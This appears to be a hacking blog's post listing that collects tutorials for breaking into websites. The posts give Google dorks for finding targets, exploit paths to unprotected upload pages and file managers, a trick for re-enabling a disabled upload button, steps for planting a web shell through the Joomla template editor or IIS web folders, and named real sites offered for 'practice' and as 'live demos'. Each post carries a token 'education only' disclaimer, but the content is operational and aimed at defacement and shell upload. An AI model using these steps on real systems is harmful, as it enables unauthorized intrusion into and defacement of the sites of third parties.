Tampilkan postingan dengan label Vulnerability. Tampilkan semua postingan
Tampilkan postingan dengan label Vulnerability. Tampilkan semua postingan

Senin, 20 Juni 2016

Israel Private 0Day Shell Upload Exploits ASP|PHP

Israel Private 0Day Shell Upload Exploits ASP|PHP

Israel Private 0Day Shell Upload Exploits ASP|PHP: Hey Guyz ..Today I found some FRESH Private Israel 0Day Exploits . So i thought of sharing with you all....So lets Start....
Israel Private 0Day Shell Upload Exploits ASP|PHP
1). First 0Day Shell Upload ASP | PHP

# Google Dork -|-
'prod1.aspx?pid=' site:il or You can also create your own Dork

# Exploit Upload 1 -|-
/admin/adminbanners.aspx

# Exploit Upload 2 -|- 
/admin/AdminPics.aspx

When you upload your asp or php shell just Check Code Source of the page you will see your url Shell example: /banners/1a62aa_bddf_4e3d_8464_f0f62ac8c7.asp
Israel Private 0Day Shell Upload Exploits ASP|PHP
2). Second 0day Upload

# Dork -|- 
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=

# Exploit -|-
/published/common/html/xinha/plugins/ImageManager/manager.php
#‎Exploit‬ -|-
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php
Israel Private 0Day Shell Upload Exploits ASP|PHP
3). Third 0day Upload Blind Sql Injection

 This just Targets with havij or manually and admin page of the script is www.target.co.il/QAdmin
# Dork -|- 

intext:cybercity site:il
inurl:index.php?id= <-- Page 4
intext:medicine site:il
inurl:index.php?id= <-- page 2

So thats it guys we have seen  Israel Private 0Day Shell Upload Exploits ASP|PHP shre it :)
Read more

How To Upload Shell in Joomla Via Admin Panel

Hello Guys! Successfully Hacked into Joomla Admin Panel? Not sure how to upload shell in jooma via admin panel? well your are at right place because today we are talking about How To Upload Shell in Joomla Via Admin Panel. Today I'm going t teach you How To Upload Shell in Joomla Via Admin Panel. Its pretty simple! just follow the following steps given below  :) :-

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

How To Upload Shell in Joomla Via Admin Panel:

Suppose we have an access to joomla admin. Now just login into it..



Once you Login you see the below screen.



Then look for Extensions and in that Template Manager.



Once you click on that you will see all the templates installed on that site.



See the marking in red it has the star. It means its the default template used by the sites currently. Select any of the template like it did beez in green.



Once you click on beez you will see the following screen. now just click on edit html



Once you click on edit html you will see the following screen



see the red part /templates/beez/index.php that is the path of your shell

Now just paste your shell code over their and save it




Once you click on save. it will take you to page were it will show you Template source saved. you work is done..

Once that is done you can access your shell. Path of the shell would be

www.site.com/templates/beez/index.php

Read more

Kamis, 22 Januari 2015

Chiangraientersoft HTML Injection Vulnerability





Hello Readers! today im gonna share a HTML Injection Vulnerability. This works most on Thailand web pages :). So lets start..

Chiangraientersoft HTML Injection Vulnerability:

1). Go to google and type any of the following dorks :-
inurl:Qread.php?id_ques=
inurl:webboard/Qread.php?id_ques=
Vulnerable at 'Qform.php' at Field Subject/Title
2). Pick any site!..and replace everything after yoursite.com/ with anyone of the following [Exploit] :
 /webboard/Qform.php
 /board/Qform.php
3). Just fill-up the forum and upload your deface page shell etc..
After your file is successfully uploaded, it would be listed at www.site.com/board/ or www.site.com/webboard/


Read more

Sabtu, 19 Juli 2014

Bypass Disabled Upload Option And Upload Shell

Bypass Disabled Upload Option And Upload ShellHello Readers! since I got many messages from people asking that they were facing many problems in shell uploading. So I have decided to write about this. Its just an example for shell uploading..

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). Find a vulnerable sites that has Disable Upload Option. Example
http://centralplaza.co.th/chiangrai/photoupload.asp
You can also use google dork for finding more:-
inurl:/photoupload.asp



2). Now right click on the page and click on Inspect Element and find the code for that upload button to enable to disabled upload button :P


3). Now Change the text disabled="disabled" to enabled="enabled" and press Enter..
Do the same for SUBMIT button and finally upload your shell.php.jpg ..

4). Now to find you uploaded shell simple click on View All Photos .. an get you Shell :)



Enjoy..!!
Read more

Kamis, 19 Juni 2014

WHMCS Auto 0day Exploiter 5.2.8 by g00n Team Xploiters

Hello Readers! Today Im going to share a wonderfull toll made by g00n Team Xploiters. Its WHMCS Auto 0day Exploiter 5.2.8 by g00n Team Xploiters [PHP] ...

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

So Here It Is:-

Here is the PHP code of this WHMCS Auto Exploiter (0day) 5.2.8:-
↓↓      ↓↓

Note:- You must save it as WHMCS Auto Exploiter.php


So in this you just have to do is crack the Hashes. In some cases just Google the hash and you will get the password. Then just log in to WHMCS ...

Scanned results will saved in a text file: WMCS-Hashes.txt

Screen Shots:-



Read more

How to Hack A Targeted Server Or A Website


Hello Readers! Today I am going to teach you how you guys can target a server and find a vulnerability and hack into..  How to Hack A Targeted Server Or A Website or How to Inject Shell in a Targeted Server or A website or How to Target a Website Or Server...This is not much easy but I will try to explain...

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). Get I.P. Address

First step is to get a I.P. address of a Website or a Server which you wanna hack. So for this we have to ping our target. To do this..
  • Go to start
  • Open CMD
  • and type :-
ping www.yourtarget.com

So, now you have Ip Address of your Target..

See the following Image as an Example :-


2). Search for Websites hosted on Targeted Server.

Now our second Step is to search for vulnerabilities in your targeted server or a website..So for this you have to do is:-
ip:[targets I.P server]

Example:- ip:74.145.128.97

Now by doing this will Display all the websites hosted on your targeted server..

3). Search for vulnerabilities..

Now third step is to search for vulnerabilities..So for this you can use normal dorks such as .php?id= for SQL Injection Vulnerable websites or you can also try any other exploit. Example:-
ip:74.145.128.97 .php?id=



Now try to find a injectable hole or vulnerability in And hack into the Server or A website. That's it :)

You can do the same if you have other bugs for joomla and other scripts. This method might be old, but its still works as gold. I hope it helps..

Enjoy..!!
Read more

Sabtu, 19 April 2014

Simple Upload 53 Shell Upload Vulnerability

This Vulnerability allows Hacker to upload Shell. Web Application vulnerability in"Simple Upload 53" PHP file allows an attacker to upload Backdoor shell code in your website.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Lets Start:-

1). Paste the below dork in the google and click search.
inurl:simple-upload-53.php
2). After you search in Google you will find many Websites containing Simple-Upload-53.php at the end of url. Now simply open any of them.



3). Now you can see the upload option in the site. Here is the vulnerability, it allows you to upload files.
You can upload Backdoor shell as ".php.jpg" or ".php.gif" etc.

4). The uploaded shell will be in this place:
http://www.site.com/files/[Your File]
After uploading the shell , You can hack/deface the site.
Read more

WebTester File Upload Vulnerability



Hello Reader,Hope you all are enjoying my posts.. here Im back with new file upload vulnerability..
called WebTester File Upload Vulnerability . SO lets start..

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). GO to google and type the following dork..
Google Dork : inurl:go.php?testID= 
For More Results Use your Brain and create your own Dork..
Exploit :http://[target]/[path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
2). Now, upload your html , txt or jpg files



3). To find you uploaded file :-
 http://target/path/test-images/[yourfile].html
Enjoy...
Read more

Hack Web Sites Using IIS Exploit [For XP Users]


Hello Readers, I heard some of you are not getting out tutorials because u have no knowledge about Web hacking and you wanna learn web hacking .. So today i decided to write this tutorial for no0bs.

Because in this tutorial we are going to learn about IIS Web Hacking Exploit the Easiest way to hack for Noobs..

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

By using this Exploit an attacker can upload shell , Deface web site delete data etc. etc can do every thing without login..:D . Yeah you heard Right.. I know you all are getting exited, So lets's start :-

Note:- this is only for Windows XP users. For Windows 7 user , i will post soon ...

Follow the Instructions:-

1). First Of all we need to find Vulnerable site. Go to google and type the following dork:-

Dork- Intext:"Powered by IIS

Actually there is no particular dork be Creative use mind and create your own unique dork :) ..

If you are unable to find Don't worry ..See the end of the tutorial i have posted some sites :)

2). After Finding Vuln Site .Click on Start button And open "RUN"


3). Now type the following code in "RUN"
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

4). Now a FOlder will open named "Web Folders"

Now Right Click in that folder then "New" And then  "Web Folder"..


5). Now paste the url of the Vulnerable site And CLick Next..


6). Now it will ask you to give Name for that Web Folder leave as it is Click Finish..


7). Congratulations! Now you are in the web site..If you wanna upload shell copy your Shell.php in to that folder and your shell will be uploded.. to path

Example : site.com/shell.php

Do the same to upload your deface also :D

Here are some site For Practicing ....  
http://www.houtai123.cn/
http://news.rhvacnet.com/
http://israelshamir.net/
http://intellectual.members.easyspace.com/
http://hoodstarsports.com/
http://jennylo.co.uk/
http://hurrelvisualarts.com/

Soon i will post list of Vuln. sites of IIS Exploit/....
Read more

Selasa, 15 April 2014

Portail Dokeos deface and Shell Upload vulnerability

Portail Dokeos Vulnerability is a Kind of FCK Editor Remote file upload Vulnerability..
In this Vulnerability Hacker can upload a shell. deface page or any file on website without admin username and password...
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). Go to Google and enter the following dork
Google Dork :"Portail Dokeos 1.8.5"
2). Open any site and change the url after site.com to the Exploitable target..For Example:-

Exploit: http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

3). Now change ASP into PHP like FCK editor and Upload you deface shell or file, You can upload, .html .php .jpg .txt formats here..



To view your uploaded file go here : http://website/patch/main/upload/your file here 

Live Demo:-
http://www.kifofy.fr/kcours/main//inc/lib/fckeditor/editor/filemanager/upload/test.html
http://ecampus.webinfo-concept.fr/main//inc/lib/fckeditor/editor/filemanager/upload/test.html

Read more